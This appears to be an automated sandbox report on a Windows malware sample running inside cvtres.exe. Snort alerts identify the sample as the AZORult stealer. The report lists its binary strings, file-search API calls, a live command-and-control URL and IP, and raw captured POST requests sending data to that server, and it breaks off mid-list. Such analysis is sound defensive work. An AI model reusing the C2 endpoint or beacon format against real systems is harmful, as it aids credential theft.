Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266909184.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BROTHERS.pdb source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250033059.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.251914030.0000000004A80000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265791708.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.267391292.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278239292.00000000081F8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265263773.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278227969.00000000081F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283893964.000000000826C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268086743.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266110570.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265641906.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: cvtres.exe, 00000001.00000003.276245137.00000000066AC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.290995859.0000000007858000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283893964.000000000826C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283972789.0000000008270000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266461893.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283512359.0000000008234000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267167676.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266581701.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270034811.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270237118.0000000006694000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264625947.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268329300.0000000007874000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265086491.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264949325.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278227969.00000000081F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.267898785.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283784153.000000000825C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268979819.0000000007870000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose, 1_2_004098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040D0A0 FindFirstFileW, 1_2_0040D0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 1_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW, 1_2_00408D44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose, 1_2_00415610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW, 1_2_004087DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040D06E FindFirstFileW, 1_2_0040D06E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose, 1_2_0041303C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose, 1_2_0040989F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose, 1_2_004111C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 1_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose, 1_2_00415610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose, 1_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose, 1_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW, 1_2_00408D3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose, 1_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose, 1_2_0041158C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose, 1_2_00411590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose, 1_2_00412D9C

Networking

barindex
Source: Traffic Snort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.7:49701 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2810276 ETPRO TROJAN AZORult CnC Beacon M1 192.168.2.7:49701 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 188.114.97.3:80 -> 192.168.2.7:49701
Source: Malware configuration extractor URLs: http://cinho.shop/PL341/index.php
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: global traffic HTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: cinho.shopContent-Length: 95Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 62 ec 47 14 8b 30 6d eb 26 66 9c 26 67 ea 26 66 98 26 66 97 26 66 99 42 16 8b 30 62 ef 47 70 9c 47 11 8b 30 65 e8 41 17 ec 45 17 Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0bG0m&f&g&f&f&fB0bGpG0eAE
Source: global traffic HTTP traffic detected: POST /PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: cinho.shopContent-Length: 47875Cache-Control: no-cache
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: NUEVA ORDEN-MATSA 10-2022,.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: NUEVA ORDEN-MATSA 10-2022,.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: NUEVA ORDEN-MATSA 10-2022,.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cvtres.exe, 00000001.00000002.299718403.0000000006690000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cinho.shop/PL341/index.php
Source: cvtres.exe, 00000001.00000002.299718403.0000000006690000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cinho.shop/PL341/index.phpA
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: NUEVA ORDEN-MATSA 10-2022,.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275071389.00000000066C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 